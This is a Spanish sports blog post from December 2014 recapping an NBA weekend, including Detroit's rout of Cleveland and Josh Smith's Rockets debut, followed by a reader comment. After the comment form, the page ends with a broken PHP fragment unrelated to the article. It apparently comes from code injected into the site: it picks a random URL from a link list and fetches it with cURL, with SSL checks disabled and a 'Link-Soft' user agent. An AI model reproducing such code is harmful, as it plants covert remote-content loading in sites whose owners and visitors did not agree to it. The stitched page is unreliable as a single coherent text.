Informe del fin de semana: Alarma en Cleveland

29 de December de 2014 por TheDeerHunter

El 28 de diciembre, los Pistons decidieron gastarle a los Cavs una buena broma en forma de humillación que enciende las alarmas en Cleveland. Los de Detroit son los grandes triunfadores del fin de semana con dos victorias en sus primeros partidos tras deshacerse de Josh Smith, al que vimos debutar en un gran encuentro entre Rockets y Grizzlies. Lowry y Butler siguen ganando puntos para el All Star Game, Jared Dudley hizo historia y Kobe regresó tras darle un descanso a su ajado cuerpo.

Han pasado más cosas este fin de semana en la NBA. Os las resumimos a continuación.

cavs_pist

El viernes asistimos al debut victorioso de Josh Smith con los Rockets ante Memphis. Precioso duelo resuelto en prórroga donde Marc se comió a un Howard renqueante y Harden coqueteó con el triple doble. En ESPN le señalan como el MVP del Oeste durante este primer trimestre de liga. Por su parte Monroe y Drummond notaron positivamente la salida de Smith y lideraron a Detroit en su victoria ante Indiana.

El otro nombre propio de estos días, Rajon Rondo, también brilló en la victoria de los Mavs en Lakerlandia y los Celtics, sin él, perdieron ante unos Nets donde Jarret Jack les hizo un traje. Para nombres propios de la jornada, el de Keneth Faried, que capturó 25 rebotes ante los Wolves, y aun así los inestables Nuggets sufrieron para apuntarse la victoria. Jared Dudley registró un inmaculado 10 de 10 en la sorpresa de la jornada, ya que los Bucks lograron frenar a los Hawks.

Los Pelicans le endosaron la 6ª derrota a los campeones en 7 partidos. La situación en la cola de playoffs del Oeste se complicaba aún más para ellos con las victorias de Thunder ante Charlotte y de los Suns en Sacramento. Finalmente los Cavs sin Irving tuvieron que remontar ante Orlando Magic y los Blazers le endosaron otra derrota más a los Sixers.

josh_mchale

El sábado vimos las derrotas de Hornets y Knicks a pesar de las exhibiciones anotadoras de Kemba Walker y Carmelo Anthony. En el segundo caso fue debida a la aún mayor exhibición de Cousins. Los Clippers tropezaron ante los Raptors en casa. Según ESPN Lowry ha sido el MVP del Este hasta ahora. Jimmy Butler, el claro favorito para el MIP, volvió a liderar a los Bulls en su victoria ante Pelicans. Los Grizzlies recuperaron la senda de la victoria a costa de los Heat. Los Hawks por su parte se vengaron de los Bucks. Los Wizards tumbaron a los Celtics, los Pacers lograron romper la buena racha de los Nets, los Jazz no tuvieron problemas con los Sixers y los Warriors tampoco los tuvieron con los Wolves.

La jornada dominical quedó inaugurada con la aplastante victoria de los Pistons en Cleveland, donde se escucharon abucheos para los locales. También se dieron triunfos visitantes por parte de los Raptors en Denver, con unos enormes Lowry & Lou-Will, y de los Suns en pista de los Lakers, pese al retorno de un Kobe más moderado en el tiro. Phoenix, ojo, anda enrachado y abre hueco sobre el noveno clasificado del Oeste. En esa batalla perdieron anoche los Thunder en Dallas, donde la ausencia de Tyson Chandler la solventó Carlisle con small ball. Cerramos con el valioso triunfo de los Spurs ante los Rockets y un nuevo desastre de los Knicks, apalizados por los Blazers pese a las bajas de Aldridge y Robin Lopez.

Top 10 de la semana

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. rumbero dice:
    #1

    ¿Los Pistons tirando un 54% desde el triple? Vaya si suena a inocentada por mucho que ya no esté Josh Smith.
    Por otro lado, muy disputado el Rockets-Spurs, con Green metiendo unas chuflas como sólo se las recuerdan en Miami. No estaban Leonard y Parker pero volvió Patty Mills que además tuvo un par de acciones clave en el último cuarto para que al final ganara San Antonio, lo necesitaban. Que buen jugador es Cory Joseph a todo esto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>